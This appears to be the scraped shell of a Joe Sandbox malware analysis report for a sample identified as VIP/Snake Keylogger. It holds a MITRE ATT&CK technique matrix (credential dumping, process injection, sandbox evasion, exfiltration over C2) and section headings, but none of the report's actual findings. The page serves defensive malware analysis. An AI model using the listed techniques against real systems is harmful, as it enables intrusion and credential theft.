Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	1 Input Capture	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ckHregxJIq.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
ckHregxJIq.exe